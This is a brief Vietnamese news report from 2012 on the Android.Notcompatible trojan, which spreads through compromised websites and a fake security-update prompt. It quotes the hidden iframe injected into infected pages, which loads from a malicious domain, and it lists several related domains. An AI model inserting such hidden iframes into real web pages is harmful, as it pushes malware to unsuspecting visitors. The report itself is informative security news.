Trojan Android.Notcompatible đang phát tán nhanh

17:55, 09/05/2012

Symantec đã phát hiện một mối đe dọa phần mềm độc hại mới trên HĐH Andoid hiện đang lây lan nhanh chóng nhờ sự góp sức tích cực từ cách website bị lây nhiễm. Mối đe dọa bảo mật mới này được Symantec phát hiện có tên là Android.Notcompatible.
 
 
 

 
 
Khi một người dùng viếng thăm một website đã bị lây nhiễm, Trojan này sẽ được tự động tải về thiết bị của người dùng. Khác với kiểu lây nhiễm drive-by download, người dùng phải đồng ý chấp nhận một cách thủ công việc cài đặt phần mềm độc hại này, thông báo lừa phỉnh người dùng thường là đề nghị người dùng “cập nhật về bảo mật” trước mối đe doạ bảo mật mới, sau đó trojan này sẽ cho phép tác giả của nó định tuyến lại luồng dữ liệu lưu thông từ một thiết bị đã bị lây nhiễm sang một điểm định trước khác. Cụ thể, khi bị lây nhiễm, các website thường bị chèn đoạn mã có dạng dưới đây vào phần mã HTML:
 

<iframe style="visibility: hidden; display: none; display: none;"
src="[http://]gaoanalitics.info/?id=[CLSID]">;
</iframe>
Tên miền [http://]gaoanalitics.info có thể được thay thế bởi các dạng tên miền khác như: [http://]androidbia.info, [http://]androidjea.info,  [http://]androidonlinefix.info

 
Phần mềm độc hại này không chỉ chèn mã độc vào các site HTML mà cả các file robots.txt, vì vậy, tất cả các file trên nền tảng web server cũng rất dễ bị đoạn mã độc này tấn công khi chèn vô.

 
Có thể thấy, mối đe dọa bảo mật mới được tiến hành khác với các phương cách tấn công truyền thống là “đập vỡ và lấy bất cứ thứ gì có thể lấy” (smash-and-grab) như lừa đảo đăng ký dịch vụ tin nhắn cao cấp mà chuyển sang các phương cách tấn công ngày càng tinh vi hơn như ăn cắp những thông tin nhạy cảm. 

 
 
M.H